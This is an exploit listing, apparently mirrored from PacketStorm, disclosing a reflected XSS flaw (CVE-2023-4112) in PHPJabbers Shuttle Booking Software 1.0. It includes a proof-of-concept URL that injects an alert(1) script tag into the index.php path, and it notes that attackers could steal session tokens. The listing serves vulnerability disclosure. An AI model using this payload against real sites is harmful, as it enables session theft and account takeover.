Share
## https://sploitus.com/exploit?id=PACKETSTORM:173930
# Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 20/07/2023  
# Vendor: PHPJabbers  
# Vendor Homepage: https://www.phpjabbers.com/  
# Software Link: https://www.phpjabbers.com/shuttle-booking-software/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-4112  
  
  
## Description  
  
The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials  
  
  
  
Path: /index.php  
  
URL parameter is vulnerable to RXSS  
  
https://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1  
  
  
[-] Done